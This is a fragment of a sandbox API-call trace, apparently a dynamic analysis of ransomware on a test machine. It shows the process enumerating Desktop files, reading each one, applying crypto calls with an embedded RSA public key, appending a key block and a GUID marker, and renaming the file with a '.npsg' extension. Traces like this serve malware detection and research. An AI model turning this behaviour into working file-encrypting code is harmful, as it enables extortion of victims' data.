hFile=0x644, liDistanceToMove=0x235f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.412] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.412] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.412] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.412] CloseHandle (hObject=0x644) returned 1 [0236.419] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TAd_29kocAxghHF.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tad_29kocaxghhf.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TAd_29kocAxghHF.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tad_29kocaxghhf.png.npsg")) returned 1 [0236.422] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3576ea60, ftCreationTime.dwHighDateTime=0x1d5b9e6, ftLastAccessTime.dwLowDateTime=0xbbf91390, ftLastAccessTime.dwHighDateTime=0x1d5bb23, ftLastWriteTime.dwLowDateTime=0xbbf91390, ftLastWriteTime.dwHighDateTime=0x1d5bb23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UKh5", cAlternateFileName="")) returned 1 [0236.422] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea248200, ftCreationTime.dwHighDateTime=0x1d5be06, ftLastAccessTime.dwLowDateTime=0x230cde50, ftLastAccessTime.dwHighDateTime=0x1d5be98, ftLastWriteTime.dwLowDateTime=0x230cde50, ftLastWriteTime.dwHighDateTime=0x1d5be98, nFileSizeHigh=0x0, nFileSizeLow=0xf349, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VDWoYc.wav", cAlternateFileName="")) returned 1 [0236.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VDWoYc.wav") returned=".wav" [0236.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VDWoYc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vdwoyc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.422] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=62281) returned 1 [0236.422] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.425] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf323, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.425] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.427] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xf349, lpOverlapped=0x0) returned 1 [0236.428] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.428] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.428] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.428] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.429] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.429] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.430] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.430] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.430] GetLastError () returned 0x0 [0236.430] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.430] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.430] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.430] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.430] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.430] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.431] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf349, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.431] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.431] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.431] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.432] CloseHandle (hObject=0x644) returned 1 [0236.433] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VDWoYc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vdwoyc.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VDWoYc.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vdwoyc.wav.npsg")) returned 1 [0236.436] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6ab3040, ftCreationTime.dwHighDateTime=0x1d5b60a, ftLastAccessTime.dwLowDateTime=0x3f9b8540, ftLastAccessTime.dwHighDateTime=0x1d5c48c, ftLastWriteTime.dwLowDateTime=0x3f9b8540, ftLastWriteTime.dwHighDateTime=0x1d5c48c, nFileSizeHigh=0x0, nFileSizeLow=0x1804c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wmy-h 74n.mkv", cAlternateFileName="WMY-H7~1.MKV")) returned 1 [0236.436] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wmy-h 74n.mkv") returned=".mkv" [0236.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wmy-h 74n.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmy-h 74n.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.436] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=98380) returned 1 [0236.436] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.439] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18026, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.439] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.442] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1804c, lpOverlapped=0x0) returned 1 [0236.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.443] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.444] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.444] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.444] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.444] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.444] GetLastError () returned 0x0 [0236.444] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.444] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.444] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.444] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.444] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.445] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.446] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1804c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.446] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.447] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.447] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.447] CloseHandle (hObject=0x644) returned 1 [0236.449] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wmy-h 74n.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmy-h 74n.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wmy-h 74n.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmy-h 74n.mkv.npsg")) returned 1 [0236.450] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f53eb00, ftCreationTime.dwHighDateTime=0x1d5d833, ftLastAccessTime.dwLowDateTime=0x6fec8180, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0x6e22be00, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0xd9400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YTHGRFED.EXE.exe", cAlternateFileName="YTHGRF~1.EXE")) returned 1 [0236.450] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe") returned=".exe" [0236.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ythgrfed.exe.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.451] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=889856) returned 1 [0236.451] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.453] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd93da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.453] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.455] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.455] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x25805, lpOverlapped=0x0) returned 1 [0236.458] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.458] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.458] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.458] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.459] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.459] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.459] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.459] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.459] GetLastError () returned 0x0 [0236.459] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.459] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.459] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.459] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.459] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25810) returned 0x3b95d50 [0236.462] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001a0 | out: hHeap=0x620000) returned 1 [0236.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001b8 | out: hHeap=0x620000) returned 1 [0236.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400200 | out: hHeap=0x620000) returned 1 [0236.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400200 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001b8 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34001a0 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001b8 | out: hHeap=0x620000) returned 1 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001a0 | out: hHeap=0x620000) returned 1 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400200 | out: hHeap=0x620000) returned 1 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.463] GetCurrentThreadId () returned 0x5b4 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x688b40 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.463] RtlAllocateHeap 